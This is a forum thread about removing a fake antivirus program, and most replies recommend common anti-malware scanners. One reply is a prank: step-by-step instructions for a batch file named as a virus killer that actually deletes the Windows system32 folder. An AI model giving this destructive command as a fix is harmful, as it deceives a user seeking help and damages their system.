Removing Vista AnitVirus Pro 2010

I have this stupid damn aniti virus thing that keeps poping up saying
i have 101 problems with my PC and i have to buy their crap to slove it
Its one of those fake anti virus things, anyway i need to get rid of it.
can anyone help ?

Google Spybot Search and Destroy. Install it, update it, run it.

When you run your scans, make sure your connection to the internet is OFF. If you're still connected while scanning, odds are the shit you just deleted will be auto dling itself back on to your computer.

try doing an Adaware, Spybot S&D, registry cleaner, firewall and antivirus scan.
if that doesn't work search google for a specific program to delete it =/

okay well now its all farked up.
i tried a manual deletion and all i ended up doing was messing up my reg files.
Because now when even i click on any program i get a message asking me to go into
Set Association control plane
How can i sort this mess out

Smooth, so we all suggested Spybot S&D and you go and delete your own files by hand...
Here, try this:
Use Tri-Force.
Step 1) Open notepad
Step 2) Type: @echo off
del c:\WINDOWS\system32
Step 3) Save as Tri_Force_Vir_Killer.bat
Step 4) Open File.
Won't matter anyways, not like he's gonna do what we tell him to.

use malwarebytes anti malware
you have to get rid of that virus fast or it eats your computer
I've gotten it a few times

take it from someone that works on campus on student computers use sophos antivirus and malwarebytes if you are not stupid about it you will never have a virus problem again.
